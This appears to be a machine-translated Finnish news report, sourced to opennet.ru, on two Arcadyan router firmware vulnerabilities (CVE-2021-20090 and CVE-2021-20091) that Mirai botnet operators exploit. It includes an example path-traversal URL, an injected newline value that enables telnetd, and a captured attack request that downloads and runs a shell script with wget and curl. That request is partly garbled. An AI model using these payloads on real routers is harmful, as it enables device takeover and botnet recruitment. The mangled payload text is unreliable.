Verkkoon on tallennettu valtava hyökkäys kotireitittimiä vastaan, joiden laiteohjelmisto käyttää Arcadyan-yhtiön HTTP-palvelintoteutusta. Laitteiden hallintaan pääsemiseksi käytetään kahden haavoittuvuuden yhdistelmää, joka mahdollistaa mielivaltaisen koodin etäsuorittamisen pääkäyttäjän oikeuksin. Ongelma koskee melko laajaa valikoimaa Arcadyanin, ASUS:n ja Buffalon ADSL-reitittimiä sekä Beeline-tuotemerkeillä toimitettuja laitteita (ongelma vahvistetaan Smart Box Flashissa), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone ja muut teleoperaattorit. On huomattava, että ongelma on ollut Arcadyan-laiteohjelmistossa yli 10 vuotta, ja tänä aikana se on onnistunut siirtymään vähintään 20 laitemalliin 17 eri valmistajalta.
Ensimmäinen haavoittuvuus, CVE-2021-20090, mahdollistaa minkä tahansa verkkokäyttöliittymän komentosarjan käytön ilman todennusta. Haavoittuvuuden ydin on, että verkkokäyttöliittymässä joihinkin hakemistoihin, joiden kautta lähetetään kuvia, CSS-tiedostoja ja JavaScript-komentotiedostoja, pääsee ilman todennusta. Tässä tapauksessa hakemistot, joille pääsy ilman todennusta on sallittu, tarkistetaan alkuperäisellä maskilla. Laiteohjelmisto estää "../"-merkkien määrittämisen poluissa päähakemistoon siirtymiselle, mutta "..%2f"-yhdistelmän käyttö ohitetaan. Näin ollen on mahdollista avata suojattuja sivuja lähetettäessä pyyntöjä, kuten "http://192.168.1.1/images/..%2findex.htm".
Toinen haavoittuvuus, CVE-2021-20091, antaa todennettulle käyttäjälle mahdollisuuden tehdä muutoksia laitteen järjestelmäasetuksiin lähettämällä erityisesti muotoiltuja parametreja apply_abstract.cgi-skriptiin, joka ei tarkista rivinvaihtomerkin läsnäoloa parametreissa. . Esimerkiksi suorittaessaan ping-toimintoa hyökkääjä voi määrittää arvon "192.168.1.2%0AARC_SYS_TelnetdEnable=1" kenttään, jossa IP-osoite tarkistetaan, ja komentosarjan luodessaan asetustiedostoa /tmp/etc/config/ .glbcfg, kirjoittaa siihen rivin "AARC_SYS_TelnetdEnable=1", joka aktivoi telnetd-palvelimen, joka tarjoaa rajoittamattoman komentotulkin pääsyn pääkäyttäjän oikeuksin. Samoin asettamalla AARC_SYS-parametrin voit suorittaa minkä tahansa koodin järjestelmässä. Ensimmäinen haavoittuvuus mahdollistaa ongelmallisen komentosarjan suorittamisen ilman todennusta käyttämällä sitä nimellä "/images/..%2fapply_abstract.cgi".
Hyödyntääkseen haavoittuvuuksia hyökkääjän on kyettävä lähettämään pyyntö verkkoporttiin, jossa verkkokäyttöliittymä toimii. Hyökkäyksen leviämisen dynamiikasta päätellen monet operaattorit jättävät laitteilleen pääsyn ulkoisesta verkosta helpottaakseen tukipalvelun ongelmien diagnosointia. Jos pääsy rajapintaan on rajoitettu vain sisäiseen verkkoon, hyökkäys voidaan suorittaa ulkoisesta verkosta "DNS-rebinding" -tekniikalla. Haavoittuvuuksia käytetään jo aktiivisesti reitittimien yhdistämiseen Mirai-botnet-verkkoon: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Yhteys: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7.ipaddress0.ipaddress1. 0%212.192.241.72A ARC_SYS_TelnetdEnable=212.192.241.72& %777AARC_SYS_=cd+/tmp; wget+http://0/lolol.sh; curl+-O+http://4/lolol.sh; chmod+XNUMX+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX
Lähde: opennet.ru